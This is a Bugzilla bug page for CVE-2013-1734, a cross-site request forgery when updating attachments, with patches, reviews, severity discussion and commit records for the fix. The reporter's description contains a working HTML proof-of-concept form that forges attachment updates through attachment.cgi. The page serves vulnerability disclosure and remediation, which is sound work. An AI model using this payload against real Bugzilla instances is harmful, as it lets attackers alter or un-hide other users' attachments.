The default bug view has changed. See this FAQ.
Bug 913904 (CVE-2013-1734)

[SECURITY] CSRF when updating attachments

RESOLVED FIXED in Bugzilla 4.0

Status

()

Bugzilla
Attachments & Requests
--
major
RESOLVED FIXED
4 years ago
3 years ago

People

(Reporter: Mateusz Goik, Assigned: Frédéric Buclin)

Tracking

({sec-high, wsec-csrf})

2.16
Bugzilla 4.0
sec-high, wsec-csrf
Dependency tree / graph
Bug Flags:
approval +
approval4.4 +
blocking4.4.1 +
approval4.2 +
blocking4.2.7 +
approval4.0 +
blocking4.0.11 +
sec-bounty +

Details

Attachments

(3 attachments)

(Reporter)

Description

4 years ago
PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://landfill.bugzilla.org/bugzilla-tip/attachment.cgi" method="POST">
      <input type="hidden" name="id" value="3100" />
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="contenttypemethod" value="manual" />
      <input type="hidden" name="delta&#95;ts" value="xxxxxx" />
      <input type="hidden" name="token" value="xxxxx" />
      <input type="hidden" name="description" value="asdasd123" />
      <input type="hidden" name="filename" value="file&#95;21994&#46;txt" />
      <input type="hidden" name="contenttypeentry" value="text&#47;plain" />
      <input type="hidden" name="comment" value="asd" />
      <input type="hidden" name="flag&#95;type&#45;4" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;4" value="" />
      <input type="hidden" name="flag&#95;type&#45;1" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;1" value="" />
      <input type="hidden" name="flag&#95;type&#45;2" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;2" value="" />
      <input type="hidden" name="flag&#95;type&#45;3" value="X" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
(Assignee)

Comment 1

4 years ago
Created attachment 801238 [details] [diff] [review]
patch for 4.4 and trunk, v1

This patch is similar to the one for process_bug.cgi.
Assignee: attach-and-request → LpSolit
Status: NEW → ASSIGNED
Attachment #801238 - Flags: review?(dkl)
(Assignee)

Comment 2

4 years ago
All versions are affected as bug 476603 was an incomplete fix.
Blocks: 912643
Depends on: 476603
Flags: blocking4.4.1+
Flags: blocking4.2.7+
Flags: blocking4.0.11+
Summary: CSRF in attachment.cgi → [SECURITY] CSRF when updating attachments
Target Milestone: --- → Bugzilla 4.0
(Assignee)

Comment 3

4 years ago
Created attachment 801248 [details] [diff] [review]
patch for 4.2, v1
Attachment #801248 - Flags: review?(dkl)
(Assignee)

Comment 4

4 years ago
Created attachment 801251 [details] [diff] [review]
patch for 4.0, v1

I had to backport the invalid_timestamp error message which didn't exist before 4.2.
Attachment #801251 - Flags: review?(dkl)
Severity: normal → major
Flags: sec-bounty?
Keywords: sec-critical, wsec-csrf
Use CVE-2013-1734

Why sec-critical? This isn't compromising bugzilla in general. Beyond vandalism what's the worst you could do here? Luring a privileged user to un-hide an attachment maybe, revealing a security bug? My initial feel was moderate, but given hidden attachments I could live with sec-high.
Alias: CVE-2013-1734
Keywords: sec-critical → sec-high
Comment on attachment 801238 [details] [diff] [review]
patch for 4.4 and trunk, v1

Review of attachment 801238 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl
Attachment #801238 - Flags: review?(dkl) → review+
Comment on attachment 801248 [details] [diff] [review]
patch for 4.2, v1

Review of attachment 801248 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl
Attachment #801248 - Flags: review?(dkl) → review+
Comment on attachment 801251 [details] [diff] [review]
patch for 4.0, v1

Review of attachment 801251 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl
Attachment #801251 - Flags: review?(dkl) → review+

Updated

4 years ago
Flags: approval?
Flags: approval4.4?
Flags: approval4.2?
Flags: approval4.0?

Updated

4 years ago
Flags: approval?
Flags: approval4.4?
Flags: approval4.4+
Flags: approval4.2?
Flags: approval4.2+
Flags: approval4.0?
Flags: approval4.0+
Flags: approval+
Flags: sec-bounty? → sec-bounty+
(Assignee)

Updated

4 years ago
Version: unspecified → 2.16
(Assignee)

Comment 10

4 years ago
Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/trunk/
modified attachment.cgi
Committed revision 8778.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.4/
modified attachment.cgi
Committed revision 8624.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.2/
modified attachment.cgi
Committed revision 8232.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.0/
modified attachment.cgi
modified template/en/default/global/code-error.html.tmpl
Committed revision 7760.
Status: ASSIGNED → RESOLVED
Last Resolved: 4 years ago
Resolution: --- → FIXED

Updated

4 years ago
Group: bugzilla-security
(Assignee)

Comment 11

4 years ago
Security advisory sent.
You need to log in before you can comment on or make changes to this bug.